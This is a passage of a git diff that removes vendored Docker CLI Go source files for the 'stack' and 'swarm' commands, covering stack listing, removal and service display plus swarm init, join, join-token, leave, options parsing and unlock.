bundle.Services { - for _, networkName := range service.Networks { - networks[networkName] = types.NetworkCreate{ - Labels: convert.AddStackLabel(namespace, nil), - } - } - } - - services := make(map[string]swarm.ServiceSpec) - for internalName, service := range bundle.Services { - name := namespace.Scope(internalName) - - var ports []swarm.PortConfig - for _, portSpec := range service.Ports { - ports = append(ports, swarm.PortConfig{ - Protocol: swarm.PortConfigProtocol(portSpec.Protocol), - TargetPort: portSpec.Port, - }) - } - - nets := []swarm.NetworkAttachmentConfig{} - for _, networkName := range service.Networks { - nets = append(nets, swarm.NetworkAttachmentConfig{ - Target: namespace.Scope(networkName), - Aliases: []string{networkName}, - }) - } - - serviceSpec := swarm.ServiceSpec{ - Annotations: swarm.Annotations{ - Name: name, - Labels: convert.AddStackLabel(namespace, service.Labels), - }, - TaskTemplate: swarm.TaskSpec{ - ContainerSpec: swarm.ContainerSpec{ - Image: service.Image, - Command: service.Command, - Args: service.Args, - Env: service.Env, - // Service Labels will not be copied to Containers - // automatically during the deployment so we apply - // it here. - Labels: convert.AddStackLabel(namespace, nil), - }, - }, - EndpointSpec: &swarm.EndpointSpec{ - Ports: ports, - }, - Networks: nets, - } - - services[internalName] = serviceSpec - } - - if err := createNetworks(ctx, dockerCli, namespace, networks); err != nil { - return err - } - return deployServices(ctx, dockerCli, services, namespace, opts.sendRegistryAuth) -} diff --git a/vendor/github.com/docker/docker/cli/command/stack/list.go b/vendor/github.com/docker/docker/cli/command/stack/list.go deleted file mode 100644 index 9b6c645e29..0000000000 --- a/vendor/github.com/docker/docker/cli/command/stack/list.go +++ /dev/null @@ -1,113 +0,0 @@ -package stack - -import ( - "fmt" - "io" - "strconv" - "text/tabwriter" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/compose/convert" - "github.com/docker/docker/client" - "github.com/spf13/cobra" -) - -const ( - listItemFmt = "%s\t%s\n" -) - -type listOptions struct { -} - -func newListCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := listOptions{} - - cmd := &cobra.Command{ - Use: "ls", - Aliases: []string{"list"}, - Short: "List stacks", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runList(dockerCli, opts) - }, - } - - return cmd -} - -func runList(dockerCli *command.DockerCli, opts listOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - stacks, err := getStacks(ctx, client) - if err != nil { - return err - } - - out := dockerCli.Out() - printTable(out, stacks) - return nil -} - -func printTable(out io.Writer, stacks []*stack) { - writer := tabwriter.NewWriter(out, 0, 4, 2, ' ', 0) - - // Ignore flushing errors - defer writer.Flush() - - fmt.Fprintf(writer, listItemFmt, "NAME", "SERVICES") - for _, stack := range stacks { - fmt.Fprintf( - writer, - listItemFmt, - stack.Name, - strconv.Itoa(stack.Services), - ) - } -} - -type stack struct { - // Name is the name of the stack - Name string - // Services is the number of the services - Services int -} - -func getStacks( - ctx context.Context, - apiclient client.APIClient, -) ([]*stack, error) { - services, err := apiclient.ServiceList( - ctx, - types.ServiceListOptions{Filters: getAllStacksFilter()}) - if err != nil { - return nil, err - } - m := make(map[string]*stack, 0) - for _, service := range services { - labels := service.Spec.Labels - name, ok := labels[convert.LabelNamespace] - if !ok { - return nil, fmt.Errorf("cannot get label %s for service %s", - convert.LabelNamespace, service.ID) - } - ztack, ok := m[name] - if !ok { - m[name] = &stack{ - Name: name, - Services: 1, - } - } else { - ztack.Services++ - } - } - var stacks []*stack - for _, stack := range m { - stacks = append(stacks, stack) - } - return stacks, nil -} diff --git a/vendor/github.com/docker/docker/cli/command/stack/opts.go b/vendor/github.com/docker/docker/cli/command/stack/opts.go deleted file mode 100644 index 74fe4f5343..0000000000 --- a/vendor/github.com/docker/docker/cli/command/stack/opts.go +++ /dev/null @@ -1,49 +0,0 @@ -package stack - -import ( - "fmt" - "io" - "os" - - "github.com/docker/docker/cli/command/bundlefile" - "github.com/spf13/pflag" -) - -func addComposefileFlag(opt *string, flags *pflag.FlagSet) { - flags.StringVarP(opt, "compose-file", "c", "", "Path to a Compose file") -} - -func addBundlefileFlag(opt *string, flags *pflag.FlagSet) { - flags.StringVar(opt, "bundle-file", "", "Path to a Distributed Application Bundle file") - flags.SetAnnotation("bundle-file", "experimental", nil) -} - -func addRegistryAuthFlag(opt *bool, flags *pflag.FlagSet) { - flags.BoolVar(opt, "with-registry-auth", false, "Send registry authentication details to Swarm agents") -} - -func loadBundlefile(stderr io.Writer, namespace string, path string) (*bundlefile.Bundlefile, error) { - defaultPath := fmt.Sprintf("%s.dab", namespace) - - if path == "" { - path = defaultPath - } - if _, err := os.Stat(path); err != nil { - return nil, fmt.Errorf( - "Bundle %s not found. Specify the path with --file", - path) - } - - fmt.Fprintf(stderr, "Loading bundle from %s\n", path) - reader, err := os.Open(path) - if err != nil { - return nil, err - } - defer reader.Close() - - bundle, err := bundlefile.LoadFile(reader) - if err != nil { - return nil, fmt.Errorf("Error reading %s: %v\n", path, err) - } - return bundle, err -} diff --git a/vendor/github.com/docker/docker/cli/command/stack/ps.go b/vendor/github.com/docker/docker/cli/command/stack/ps.go deleted file mode 100644 index e4351bfc7c..0000000000 --- a/vendor/github.com/docker/docker/cli/command/stack/ps.go +++ /dev/null @@ -1,61 +0,0 @@ -package stack - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/idresolver" - "github.com/docker/docker/cli/command/task" - "github.com/docker/docker/opts" - "github.com/spf13/cobra" -) - -type psOptions struct { - filter opts.FilterOpt - noTrunc bool - namespace string - noResolve bool -} - -func newPsCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := psOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "ps [OPTIONS] STACK", - Short: "List the tasks in the stack", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.namespace = args[0] - return runPS(dockerCli, opts) - }, - } - flags := cmd.Flags() - flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate output") - flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names") - flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") - - return cmd -} - -func runPS(dockerCli *command.DockerCli, opts psOptions) error { - namespace := opts.namespace - client := dockerCli.Client() - ctx := context.Background() - - filter := getStackFilterFromOpt(opts.namespace, opts.filter) - tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: filter}) - if err != nil { - return err - } - - if len(tasks) == 0 { - fmt.Fprintf(dockerCli.Out(), "Nothing found in stack: %s\n", namespace) - return nil - } - - return task.Print(dockerCli, ctx, tasks, idresolver.New(client, opts.noResolve), opts.noTrunc) -} diff --git a/vendor/github.com/docker/docker/cli/command/stack/remove.go b/vendor/github.com/docker/docker/cli/command/stack/remove.go deleted file mode 100644 index 966c1aa6bf..0000000000 --- a/vendor/github.com/docker/docker/cli/command/stack/remove.go +++ /dev/null @@ -1,112 +0,0 @@ -package stack - -import ( - "fmt" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type removeOptions struct { - namespace string -} - -func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts removeOptions - - cmd := &cobra.Command{ - Use: "rm STACK", - Aliases: []string{"remove", "down"}, - Short: "Remove the stack", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.namespace = args[0] - return runRemove(dockerCli, opts) - }, - } - return cmd -} - -func runRemove(dockerCli *command.DockerCli, opts removeOptions) error { - namespace := opts.namespace - client := dockerCli.Client() - ctx := context.Background() - - services, err := getServices(ctx, client, namespace) - if err != nil { - return err - } - - networks, err := getStackNetworks(ctx, client, namespace) - if err != nil { - return err - } - - secrets, err := getStackSecrets(ctx, client, namespace) - if err != nil { - return err - } - - if len(services)+len(networks)+len(secrets) == 0 { - fmt.Fprintf(dockerCli.Out(), "Nothing found in stack: %s\n", namespace) - return nil - } - - hasError := removeServices(ctx, dockerCli, services) - hasError = removeSecrets(ctx, dockerCli, secrets) || hasError - hasError = removeNetworks(ctx, dockerCli, networks) || hasError - - if hasError { - return fmt.Errorf("Failed to remove some resources") - } - return nil -} - -func removeServices( - ctx context.Context, - dockerCli *command.DockerCli, - services []swarm.Service, -) bool { - var err error - for _, service := range services { - fmt.Fprintf(dockerCli.Err(), "Removing service %s\n", service.Spec.Name) - if err = dockerCli.Client().ServiceRemove(ctx, service.ID); err != nil { - fmt.Fprintf(dockerCli.Err(), "Failed to remove service %s: %s", service.ID, err) - } - } - return err != nil -} - -func removeNetworks( - ctx context.Context, - dockerCli *command.DockerCli, - networks []types.NetworkResource, -) bool { - var err error - for _, network := range networks { - fmt.Fprintf(dockerCli.Err(), "Removing network %s\n", network.Name) - if err = dockerCli.Client().NetworkRemove(ctx, network.ID); err != nil { - fmt.Fprintf(dockerCli.Err(), "Failed to remove network %s: %s", network.ID, err) - } - } - return err != nil -} - -func removeSecrets( - ctx context.Context, - dockerCli *command.DockerCli, - secrets []swarm.Secret, -) bool { - var err error - for _, secret := range secrets { - fmt.Fprintf(dockerCli.Err(), "Removing secret %s\n", secret.Spec.Name) - if err = dockerCli.Client().SecretRemove(ctx, secret.ID); err != nil { - fmt.Fprintf(dockerCli.Err(), "Failed to remove secret %s: %s", secret.ID, err) - } - } - return err != nil -} diff --git a/vendor/github.com/docker/docker/cli/command/stack/services.go b/vendor/github.com/docker/docker/cli/command/stack/services.go deleted file mode 100644 index a46652df7c..0000000000 --- a/vendor/github.com/docker/docker/cli/command/stack/services.go +++ /dev/null @@ -1,79 +0,0 @@ -package stack - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/service" - "github.com/docker/docker/opts" - "github.com/spf13/cobra" -) - -type servicesOptions struct { - quiet bool - filter opts.FilterOpt - namespace string -} - -func newServicesCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := servicesOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "services [OPTIONS] STACK", - Short: "List the services in the stack", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.namespace = args[0] - return runServices(dockerCli, opts) - }, - } - flags := cmd.Flags() - flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs") - flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") - - return cmd -} - -func runServices(dockerCli *command.DockerCli, opts servicesOptions) error { - ctx := context.Background() - client := dockerCli.Client() - - filter := getStackFilterFromOpt(opts.namespace, opts.filter) - services, err := client.ServiceList(ctx, types.ServiceListOptions{Filters: filter}) - if err != nil { - return err - } - - out := dockerCli.Out() - - // if no services in this stack, print message and exit 0 - if len(services) == 0 { - fmt.Fprintf(out, "Nothing found in stack: %s\n", opts.namespace) - return nil - } - - if opts.quiet { - service.PrintQuiet(out, services) - } else { - taskFilter := filters.NewArgs() - for _, service := range services { - taskFilter.Add("service", service.ID) - } - - tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: taskFilter}) - if err != nil { - return err - } - nodes, err := client.NodeList(ctx, types.NodeListOptions{}) - if err != nil { - return err - } - service.PrintNotQuiet(out, services, nodes, tasks) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/cmd.go b/vendor/github.com/docker/docker/cli/command/swarm/cmd.go deleted file mode 100644 index 632679c4b6..0000000000 --- a/vendor/github.com/docker/docker/cli/command/swarm/cmd.go +++ /dev/null @@ -1,28 +0,0 @@ -package swarm - -import ( - "github.com/spf13/cobra" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" -) - -// NewSwarmCommand returns a cobra command for `swarm` subcommands -func NewSwarmCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "swarm", - Short: "Manage Swarm", - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - } - cmd.AddCommand( - newInitCommand(dockerCli), - newJoinCommand(dockerCli), - newJoinTokenCommand(dockerCli), - newUnlockKeyCommand(dockerCli), - newUpdateCommand(dockerCli), - newLeaveCommand(dockerCli), - newUnlockCommand(dockerCli), - ) - return cmd -} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/init.go b/vendor/github.com/docker/docker/cli/command/swarm/init.go deleted file mode 100644 index 2550feeb47..0000000000 --- a/vendor/github.com/docker/docker/cli/command/swarm/init.go +++ /dev/null @@ -1,85 +0,0 @@ -package swarm - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/pkg/errors" - "github.com/spf13/cobra" - "github.com/spf13/pflag" -) - -type initOptions struct { - swarmOptions - listenAddr NodeAddrOption - // Not a NodeAddrOption because it has no default port. - advertiseAddr string - forceNewCluster bool -} - -func newInitCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := initOptions{ - listenAddr: NewListenAddrOption(), - } - - cmd := &cobra.Command{ - Use: "init [OPTIONS]", - Short: "Initialize a swarm", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runInit(dockerCli, cmd.Flags(), opts) - }, - } - - flags := cmd.Flags() - flags.Var(&opts.listenAddr, flagListenAddr, "Listen address (format: [:port])") - flags.StringVar(&opts.advertiseAddr, flagAdvertiseAddr, "", "Advertised address (format: [:port])") - flags.BoolVar(&opts.forceNewCluster, "force-new-cluster", false, "Force create a new cluster from current state") - flags.BoolVar(&opts.autolock, flagAutolock, false, "Enable manager autolocking (requiring an unlock key to start a stopped manager)") - addSwarmFlags(flags, &opts.swarmOptions) - return cmd -} - -func runInit(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts initOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - req := swarm.InitRequest{ - ListenAddr: opts.listenAddr.String(), - AdvertiseAddr: opts.advertiseAddr, - ForceNewCluster: opts.forceNewCluster, - Spec: opts.swarmOptions.ToSpec(flags), - AutoLockManagers: opts.swarmOptions.autolock, - } - - nodeID, err := client.SwarmInit(ctx, req) - if err != nil { - if strings.Contains(err.Error(), "could not choose an IP address to advertise") || strings.Contains(err.Error(), "could not find the system's IP address") { - return errors.New(err.Error() + " - specify one with --advertise-addr") - } - return err - } - - fmt.Fprintf(dockerCli.Out(), "Swarm initialized: current node (%s) is now a manager.\n\n", nodeID) - - if err := printJoinCommand(ctx, dockerCli, nodeID, true, false); err != nil { - return err - } - - fmt.Fprint(dockerCli.Out(), "To add a manager to this swarm, run 'docker swarm join-token manager' and follow the instructions.\n\n") - - if req.AutoLockManagers { - unlockKeyResp, err := client.SwarmGetUnlockKey(ctx) - if err != nil { - return errors.Wrap(err, "could not fetch unlock key") - } - printUnlockCommand(ctx, dockerCli, unlockKeyResp.UnlockKey) - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/join.go b/vendor/github.com/docker/docker/cli/command/swarm/join.go deleted file mode 100644 index 004313b4c6..0000000000 --- a/vendor/github.com/docker/docker/cli/command/swarm/join.go +++ /dev/null @@ -1,69 +0,0 @@ -package swarm - -import ( - "fmt" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type joinOptions struct { - remote string - listenAddr NodeAddrOption - // Not a NodeAddrOption because it has no default port. - advertiseAddr string - token string -} - -func newJoinCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := joinOptions{ - listenAddr: NewListenAddrOption(), - } - - cmd := &cobra.Command{ - Use: "join [OPTIONS] HOST:PORT", - Short: "Join a swarm as a node and/or manager", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.remote = args[0] - return runJoin(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.Var(&opts.listenAddr, flagListenAddr, "Listen address (format: [:port])") - flags.StringVar(&opts.advertiseAddr, flagAdvertiseAddr, "", "Advertised address (format: [:port])") - flags.StringVar(&opts.token, flagToken, "", "Token for entry into the swarm") - return cmd -} - -func runJoin(dockerCli *command.DockerCli, opts joinOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - req := swarm.JoinRequest{ - JoinToken: opts.token, - ListenAddr: opts.listenAddr.String(), - AdvertiseAddr: opts.advertiseAddr, - RemoteAddrs: []string{opts.remote}, - } - err := client.SwarmJoin(ctx, req) - if err != nil { - return err - } - - info, err := client.Info(ctx) - if err != nil { - return err - } - - if info.Swarm.ControlAvailable { - fmt.Fprintln(dockerCli.Out(), "This node joined a swarm as a manager.") - } else { - fmt.Fprintln(dockerCli.Out(), "This node joined a swarm as a worker.") - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/join_token.go b/vendor/github.com/docker/docker/cli/command/swarm/join_token.go deleted file mode 100644 index 3a17a8020f..0000000000 --- a/vendor/github.com/docker/docker/cli/command/swarm/join_token.go +++ /dev/null @@ -1,105 +0,0 @@ -package swarm - -import ( - "errors" - "fmt" - - "github.com/spf13/cobra" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "golang.org/x/net/context" -) - -func newJoinTokenCommand(dockerCli *command.DockerCli) *cobra.Command { - var rotate, quiet bool - - cmd := &cobra.Command{ - Use: "join-token [OPTIONS] (worker|manager)", - Short: "Manage join tokens", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - worker := args[0] == "worker" - manager := args[0] == "manager" - - if !worker && !manager { - return errors.New("unknown role " + args[0]) - } - - client := dockerCli.Client() - ctx := context.Background() - - if rotate { - var flags swarm.UpdateFlags - - swarm, err := client.SwarmInspect(ctx) - if err != nil { - return err - } - - flags.RotateWorkerToken = worker - flags.RotateManagerToken = manager - - err = client.SwarmUpdate(ctx, swarm.Version, swarm.Spec, flags) - if err != nil { - return err - } - if !quiet { - fmt.Fprintf(dockerCli.Out(), "Successfully rotated %s join token.\n\n", args[0]) - } - } - - swarm, err := client.SwarmInspect(ctx) - if err != nil { - return err - } - - if quiet { - if worker { - fmt.Fprintln(dockerCli.Out(), swarm.JoinTokens.Worker) - } else { - fmt.Fprintln(dockerCli.Out(), swarm.JoinTokens.Manager) - } - } else { - info, err := client.Info(ctx) - if err != nil { - return err - } - return printJoinCommand(ctx, dockerCli, info.Swarm.NodeID, worker, manager) - } - return nil - }, - } - - flags := cmd.Flags() - flags.BoolVar(&rotate, flagRotate, false, "Rotate join token") - flags.BoolVarP(&quiet, flagQuiet, "q", false, "Only display token") - - return cmd -} - -func printJoinCommand(ctx context.Context, dockerCli *command.DockerCli, nodeID string, worker bool, manager bool) error { - client := dockerCli.Client() - - swarm, err := client.SwarmInspect(ctx) - if err != nil { - return err - } - - node, _, err := client.NodeInspectWithRaw(ctx, nodeID) - if err != nil { - return err - } - - if node.ManagerStatus != nil { - if worker { - fmt.Fprintf(dockerCli.Out(), "To add a worker to this swarm, run the following command:\n\n docker swarm join \\\n --token %s \\\n %s\n\n", swarm.JoinTokens.Worker, node.ManagerStatus.Addr) - } - if manager { - fmt.Fprintf(dockerCli.Out(), "To add a manager to this swarm, run the following command:\n\n docker swarm join \\\n --token %s \\\n %s\n\n", swarm.JoinTokens.Manager, node.ManagerStatus.Addr) - } - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/leave.go b/vendor/github.com/docker/docker/cli/command/swarm/leave.go deleted file mode 100644 index e2cfa0a045..0000000000 --- a/vendor/github.com/docker/docker/cli/command/swarm/leave.go +++ /dev/null @@ -1,44 +0,0 @@ -package swarm - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type leaveOptions struct { - force bool -} - -func newLeaveCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := leaveOptions{} - - cmd := &cobra.Command{ - Use: "leave [OPTIONS]", - Short: "Leave the swarm", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runLeave(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.force, "force", "f", false, "Force this node to leave the swarm, ignoring warnings") - return cmd -} - -func runLeave(dockerCli *command.DockerCli, opts leaveOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - if err := client.SwarmLeave(ctx, opts.force); err != nil { - return err - } - - fmt.Fprintln(dockerCli.Out(), "Node left the swarm.") - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/opts.go b/vendor/github.com/docker/docker/cli/command/swarm/opts.go deleted file mode 100644 index 9db46dcf55..0000000000 --- a/vendor/github.com/docker/docker/cli/command/swarm/opts.go +++ /dev/null @@ -1,209 +0,0 @@ -package swarm - -import ( - "encoding/csv" - "errors" - "fmt" - "strings" - "time" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/opts" - "github.com/spf13/pflag" -) - -const ( - defaultListenAddr = "0.0.0.0:2377" - - flagCertExpiry = "cert-expiry" - flagDispatcherHeartbeat = "dispatcher-heartbeat" - flagListenAddr = "listen-addr" - flagAdvertiseAddr = "advertise-addr" - flagQuiet = "quiet" - flagRotate = "rotate" - flagToken = "token" - flagTaskHistoryLimit = "task-history-limit" - flagExternalCA = "external-ca" - flagMaxSnapshots = "max-snapshots" - flagSnapshotInterval = "snapshot-interval" - flagLockKey = "lock-key" - flagAutolock = "autolock" -) - -type swarmOptions struct { - taskHistoryLimit int64 - dispatcherHeartbeat time.Duration - nodeCertExpiry time.Duration - externalCA ExternalCAOption - maxSnapshots uint64 - snapshotInterval uint64 - autolock bool -} - -// NodeAddrOption is a pflag.Value for listening addresses -type NodeAddrOption struct { - addr string -} - -// String prints the representation of this flag -func (a *NodeAddrOption) String() string { - return a.Value() -} - -// Set the value for this flag -func (a *NodeAddrOption) Set(value string) error { - addr, err := opts.ParseTCPAddr(value, a.addr) - if err != nil { - return err - } - a.addr = addr - return nil -} - -// Type returns the type of this flag -func (a *NodeAddrOption) Type() string { - return "node-addr" -} - -// Value returns the value of this option as addr:port -func (a *NodeAddrOption) Value() string { - return strings.TrimPrefix(a.addr, "tcp://") -} - -// NewNodeAddrOption returns a new node address option -func NewNodeAddrOption(addr string) NodeAddrOption { - return NodeAddrOption{addr} -} - -// NewListenAddrOption returns a NodeAddrOption with default values -func NewListenAddrOption() NodeAddrOption { - return NewNodeAddrOption(defaultListenAddr) -} - -// ExternalCAOption is a Value type for parsing external CA specifications. -type ExternalCAOption struct { - values []*swarm.ExternalCA -} - -// Set parses an external CA option. -func (m *ExternalCAOption) Set(value string) error { - parsed, err := parseExternalCA(value) - if err != nil { - return err - } - - m.values = append(m.values, parsed) - return nil -} - -// Type returns the type of this option. -func (m *ExternalCAOption) Type() string { - return "external-ca" -} - -// String returns a string repr of this option. -func (m *ExternalCAOption) String() string { - externalCAs := []string{} - for _, externalCA := range m.values { - repr := fmt.Sprintf("%s: %s", externalCA.Protocol, externalCA.URL) - externalCAs = append(externalCAs, repr) - } - return strings.Join(externalCAs, ", ") -} - -// Value returns the external CAs -func (m *ExternalCAOption) Value() []*swarm.ExternalCA { - return m.values -} - -// parseExternalCA parses an external CA specification from the command line, -// such as protocol=cfssl,url=https://example.com. -func parseExternalCA(caSpec string) (*swarm.ExternalCA, error) { - csvReader := csv.NewReader(strings.NewReader(caSpec)) - fields, err := csvReader.Read() - if err != nil { - return nil, err - } - - externalCA := swarm.ExternalCA{ - Options: make(map[string]string), - } - - var ( - hasProtocol bool - hasURL bool - ) - - for _, field := range fields { - parts := strings.SplitN(field, "=", 2) - - if len(parts) != 2 { - return nil, fmt.Errorf("invalid field '%s' must be a key=value pair", field) - } - - key, value := parts[0], parts[1] - - switch strings.ToLower(key) { - case "protocol": - hasProtocol = true - if strings.ToLower(value) == string(swarm.ExternalCAProtocolCFSSL) { - externalCA.Protocol = swarm.ExternalCAProtocolCFSSL - } else { - return nil, fmt.Errorf("unrecognized external CA protocol %s", value) - } - case "url": - hasURL = true - externalCA.URL = value - default: - externalCA.Options[key] = value - } - } - - if !hasProtocol { - return nil, errors.New("the external-ca option needs a protocol= parameter") - } - if !hasURL { - return nil, errors.New("the external-ca option needs a url= parameter") - } - - return &externalCA, nil -} - -func addSwarmFlags(flags *pflag.FlagSet, opts *swarmOptions) { - flags.Int64Var(&opts.taskHistoryLimit, flagTaskHistoryLimit, 5, "Task history retention limit") - flags.DurationVar(&opts.dispatcherHeartbeat, flagDispatcherHeartbeat, time.Duration(5*time.Second), "Dispatcher heartbeat period (ns|us|ms|s|m|h)") - flags.DurationVar(&opts.nodeCertExpiry, flagCertExpiry, time.Duration(90*24*time.Hour), "Validity period for node certificates (ns|us|ms|s|m|h)") - flags.Var(&opts.externalCA, flagExternalCA, "Specifications of one or more certificate signing endpoints") - flags.Uint64Var(&opts.maxSnapshots, flagMaxSnapshots, 0, "Number of additional Raft snapshots to retain") - flags.Uint64Var(&opts.snapshotInterval, flagSnapshotInterval, 10000, "Number of log entries between Raft snapshots") -} - -func (opts *swarmOptions) mergeSwarmSpec(spec *swarm.Spec, flags *pflag.FlagSet) { - if flags.Changed(flagTaskHistoryLimit) { - spec.Orchestration.TaskHistoryRetentionLimit = &opts.taskHistoryLimit - } - if flags.Changed(flagDispatcherHeartbeat) { - spec.Dispatcher.HeartbeatPeriod = opts.dispatcherHeartbeat - } - if flags.Changed(flagCertExpiry) { - spec.CAConfig.NodeCertExpiry = opts.nodeCertExpiry - } - if flags.Changed(flagExternalCA) { - spec.CAConfig.ExternalCAs = opts.externalCA.Value() - } - if flags.Changed(flagMaxSnapshots) { - spec.Raft.KeepOldSnapshots = &opts.maxSnapshots - } - if flags.Changed(flagSnapshotInterval) { - spec.Raft.SnapshotInterval = opts.snapshotInterval - } - if flags.Changed(flagAutolock) { - spec.EncryptionConfig.AutoLockManagers = opts.autolock - } -} - -func (opts *swarmOptions) ToSpec(flags *pflag.FlagSet) swarm.Spec { - var spec swarm.Spec - opts.mergeSwarmSpec(&spec, flags) - return spec -} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/opts_test.go b/vendor/github.com/docker/docker/cli/command/swarm/opts_test.go deleted file mode 100644 index 568dc87302..0000000000 --- a/vendor/github.com/docker/docker/cli/command/swarm/opts_test.go +++ /dev/null @@ -1,37 +0,0 @@ -package swarm - -import ( - "testing" - - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestNodeAddrOptionSetHostAndPort(t *testing.T) { - opt := NewNodeAddrOption("old:123") - addr := "newhost:5555" - assert.NilError(t, opt.Set(addr)) - assert.Equal(t, opt.Value(), addr) -} - -func TestNodeAddrOptionSetHostOnly(t *testing.T) { - opt := NewListenAddrOption() - assert.NilError(t, opt.Set("newhost")) - assert.Equal(t, opt.Value(), "newhost:2377") -} - -func TestNodeAddrOptionSetHostOnlyIPv6(t *testing.T) { - opt := NewListenAddrOption() - assert.NilError(t, opt.Set("::1")) - assert.Equal(t, opt.Value(), "[::1]:2377") -} - -func TestNodeAddrOptionSetPortOnly(t *testing.T) { - opt := NewListenAddrOption() - assert.NilError(t, opt.Set(":4545")) - assert.Equal(t, opt.Value(), "0.0.0.0:4545") -} - -func TestNodeAddrOptionSetInvalidFormat(t *testing.T) { - opt := NewListenAddrOption() - assert.Error(t, opt.Set("http://localhost:4545"), "Invalid") -} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/unlock.go b/vendor/github.com/docker/docker/cli/command/swarm/unlock.go deleted file mode 100644 index 048fb56e3d..0000000000 --- a/vendor/github.com/docker/docker/cli/command/swarm/unlock.go +++ /dev/null @@ -1,54 +0,0 @@ -package swarm - -import ( - "bufio" - "fmt" - "io" - "strings" - - "github.com/spf13/cobra" - "golang.org/x/crypto/ssh/terminal" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "golang.org/x/net/context" -) - -func newUnlockCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "unlock", - Short: "Unlock swarm", - Args: cli.ExactArgs(0), - RunE: func(cmd *cobra.Command, args []string) error { - client := dockerCli.Client() - ctx := context.Background() - - key, err := readKey(dockerCli.In(), "Please enter unlock key: ") - if err != nil { - return err - } - req := swarm.UnlockRequest{ - UnlockKey: key, - } - - return client.SwarmUnlock(ctx, req) - }, - } - - return cmd -} - -func readKey(in *command.InStream, prompt string) (string, error) { - if in.IsTerminal() { - fmt.Print(prompt) - dt, err := terminal.ReadPassword(int(in.FD())) - fmt.Println() - return string(dt), err - } - key, err := bufio.NewReader(in).ReadString('\n') - if err == io.EOF { - err = nil - } - return strings.TrimSpace(key), err -} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go b/vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go deleted file mode 100644 index 96450f55b8..0000000000 --- a/vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go +++ /dev/null @@ -1,79 +0,0 @@ -package swarm - -import ( - "fmt" - - "github.com/spf13/cobra" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/pkg/errors" - "golang.org/x/net/context" -) - -func newUnlockKeyCommand(dockerCli *command.DockerCli) *cobra.Command { - var rotate, quiet bool - - cmd := &cobra.Command{ - Use: "unlock-key [OPTIONS]", - Short: "Manage the unlock key", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) 